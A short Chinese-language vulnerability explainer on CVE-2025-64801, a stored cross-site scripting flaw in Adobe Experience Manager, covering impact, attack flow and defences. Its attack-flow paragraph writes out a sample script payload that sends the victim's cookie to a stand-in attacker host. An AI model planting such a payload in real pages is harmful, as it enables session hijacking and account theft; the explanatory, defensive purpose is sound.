CVE-2025-64801CVE-2025-64801是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响6.5.23及更早版本,允许低权限攻击者将恶意脚本注入到存在漏洞的表单字段中。由于是存储型XSS,恶意JavaScript代码会被永久保存在目标服务器的数据库或文件系统中。当其他用户访问包含该恶意脚本的页面时,攻击者的JavaScript代码将在受害者浏览器中执行,从而窃取会话Cookie、劫持用户账户、进行钓鱼攻击或修改页面显示内容。攻击者利用此漏洞需要拥有低权限账户,并诱导具有更高权限的用户访问恶意页面。由于Adobe Experience Manager是企业级内容管理系统,广泛用于构建企业网站和数字体验平台,该漏洞可能影响大量企业用户的数据安全。CVSS 3.1评分5.4表明该漏洞具有中等严重性,需要用户交互才能成功利用,但通过网络即可发起攻击。
该漏洞是典型的存储型跨站脚本攻击(Stored XSS)。攻击流程如下:首先,低权限攻击者登录Adobe Experience Manager系统,使用其账户访问存在漏洞的表单字段(如评论、反馈表单、自定义表单等)。攻击者在表单输入框中注入恶意JavaScript代码,例如:<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>。由于应用程序未对用户输入进行充分的输入验证和输出编码,恶意脚本被存储在后端数据库中。当其他用户(如管理员或高权限用户)访问包含该表单的页面时,服务器从数据库读取并返回包含恶意脚本的HTML内容。受害者浏览器在渲染页面时执行嵌入的JavaScript代码,实现攻击者的恶意目的。攻击者可通过此方式窃取受害者的会话令牌、凭据或其他敏感信息,或者在页面中注入伪造的登录表单进行钓鱼攻击。防御此类漏洞需要在服务端对所有用户输入进行严格的输入验证,并在输出时进行适当的HTML编码或使用内容安全策略(CSP)。